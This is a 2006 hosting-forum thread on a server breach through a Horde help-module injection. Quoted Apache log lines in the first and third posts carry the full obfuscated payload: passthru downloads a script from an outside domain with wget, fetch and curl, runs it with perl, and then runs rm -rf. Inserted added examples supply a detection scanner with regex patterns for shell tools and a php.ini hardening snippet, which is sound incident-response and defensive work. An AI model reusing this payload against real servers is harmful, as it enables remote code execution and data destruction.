
Security Update: Horde Exploit

Discussion in 'Security' started by stugster, Sep 8, 2006.

  1. stugster (Well-Known Member; joined Apr 16, 2002; Edinburgh, UK; cPanel Access Level: Root Administrator)

    Hey guys, just letting you know that our server was compromised and completely messed up last night by a Horde exploit.

    Here's an output from our technician:

    The hacker got into the server using an apache exploit:
    ------------------------------------------------------------------------------------------------
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:56 -0500] " GET /horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 404 -

    -------------------------------------------------------------------------------------------------

    We're going to have to migrate to another box - rather than just messing about with the files.

    Just a heads up for you's!
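The egrep in the technician's output only catches this request because of the `chr(` and `wget%20` fragments; it has no pattern for `passthru(`, and it leaves the reader to hand-decode the `%22.chr(47).%22` obfuscation. The following scanner is an added example, not code from the post, cPanel or Horde: it parses Apache combined-log lines, URL-decodes the request, flags PHP execution functions and download/exec tools, then undoes the `chr(47)` concatenation so the dropped command reads the way the attacker wrote it. The sample log is constructed: the first line is the request quoted above (IP and domain as they appear in the post, forum line breaks re-encoded as `%20`), the other two are benign requests added for contrast.

```python
"""Decode and triage command-injection attempts in an Apache access log.

Added example, not from the forum post or from Horde/cPanel. It generalizes
the egrep in the post: parse each line, URL-decode the request, look for PHP
execution functions and download/exec tools, then undo the chr(47) trick.
"""
import re
from urllib.parse import unquote

# Constructed sample: line 1 is the attack request quoted in the post (IP and
# domain as they appear there, forum line breaks re-encoded as %20); lines 2-3
# are benign requests added so the scanner has something to ignore.
SAMPLE_LOG = [
    '200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] "GET /horde-cvs/horde/services/help/'
    '?show=about&module=;%20%22.passthru(%22killall%20-9%20perl;%20cd%20%22.chr(47).%22tmp;'
    '%20wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h;'
    '%20fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h;'
    '%20curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h;'
    '%20perl%20h;%20rm%20-rf%20*%22);%20\'. HTTP/1.1" 302 310',
    '192.0.2.10 - - [28/Apr/2006:07:00:00 -0500] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 4120',
    '198.51.100.7 - - [28/Apr/2006:07:05:13 -0500] "GET /docs/perl-guide.html HTTP/1.1" 200 8800',
]

# Apache combined/common log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"\s*(?P<method>[A-Z]+)\s+(?P<request>.+?)\s+HTTP/\d\.\d"\s+(?P<status>\d{3})'
)

# Indicators are matched on the URL-decoded request. The last two mirror the
# tool list in the post's egrep; the first two cover what that egrep missed.
INDICATORS = [
    ('php_exec', re.compile(r'(?:passthru|system|shell_exec|exec|popen)\s*\(', re.I)),
    ('chr_obfuscation', re.compile(r'chr\s*\(\s*\d+\s*\)', re.I)),
    ('downloader', re.compile(r'\b(?:wget|curl|fetch)\s+', re.I)),
    ('exec_tool', re.compile(r'\b(?:perl|chmod|gcc|sh)\s+', re.I)),
]

# The injected PHP builds the shell command with string concatenation so the
# literal "/" never appears in the URL; chr(47) is "/" in ASCII.
CMD_RE = re.compile(r'(?:passthru|system|shell_exec|exec)\s*\(\s*"(.*?)"\s*\)', re.I | re.S)


def decode_request(raw):
    """URL-decode and collapse '".chr(47)."' (or the single-quoted form) to '/'."""
    s = unquote(raw)
    s = s.replace('".chr(47)."', '/')
    s = s.replace("'.chr(47).'", '/')
    return s


def find_indicators(raw):
    """Return the names of every indicator present in the decoded request."""
    decoded = unquote(raw)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def extract_command(decoded):
    """Pull the shell command handed to passthru()/system() after deobfuscation."""
    m = CMD_RE.search(decoded)
    return m.group(1) if m else None


def scan(lines):
    """Yield one dict per suspicious request; lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = find_indicators(m['request'])
        if not indicators:
            continue
        decoded = decode_request(m['request'])
        hits.append({
            'ip': m['ip'], 'time': m['ts'], 'status': m['status'],
            'path': decoded.split('?', 1)[0],
            'indicators': indicators,
            'command': extract_command(decoded),
            'decoded': decoded,
        })
    return hits


if __name__ == '__main__':
    for h in scan(SAMPLE_LOG):
        print(f"{h['ip']} {h['time']} {h['status']} {h['path']}")
        print("  indicators:", ', '.join(h['indicators']))
        print("  command   :", h['command'])
```

To run it over a real log, pass the file object, e.g. `scan(open('/usr/local/apache/logs/access_log'))`. Read the status column alongside the decoded command: a 404, like the third line in the post, means the path did not exist on that host and the payload never reached Horde, while the 302 and 200 responses are the requests that were handed to an application and need follow-up on the box.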
     
  2. netlook (Well-Known Member, PartnerNOC; joined Mar 25, 2004)

    I think passthru() and other "dangerous" functions in PHP should be disabled by default on all webhosting boxes!
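What that suggestion looks like as a php.ini setting, shown here as an added example rather than anything from the post or cPanel's shipped defaults. `disable_functions` is a system-level directive (PHP_INI_SYSTEM), so it must go in php.ini itself, not in `.htaccess` or `ini_set()`; use `php --ini` to find the file that is loaded.

```ini
; Weak: PHP's default leaves every process-execution function enabled, so code
; injected into the Horde help module (or any eval()'d string) can call
; passthru() and drop a file into /tmp exactly as the logged request does.
;disable_functions =

; Hardened: block the functions the logged payload, and most drop-and-run
; payloads, depend on. Disabling shell_exec also disables the backtick operator.
disable_functions = passthru,system,exec,shell_exec,popen,proc_open,pcntl_exec
```

Verify with `php -r 'passthru("id");'`, which should now print a warning that passthru() has been disabled for security reasons. The caveat is that this narrows what an injection can do; it does not remove the injection. `eval()` is a language construct, not a function, so it cannot be listed here, and PHP code that reaches `eval()` can still read and write files inside the web root. The setting is a second layer under patching Horde, not a substitute for it.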
     
  3. randomuser (Well-Known Member; joined Jun 25, 2005)

    Was it a Horde vulnerability or an Apache vulnerability? You state both. Your logs show Horde, which would mean that Horde is accessible on your server remotely without first authenticating for webmail.


    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -


    The 3rd log was a 404. The first 2 logs, shown above, are from April. The Horde exploit in the logs is old now, having been out for a few months and already patched.
     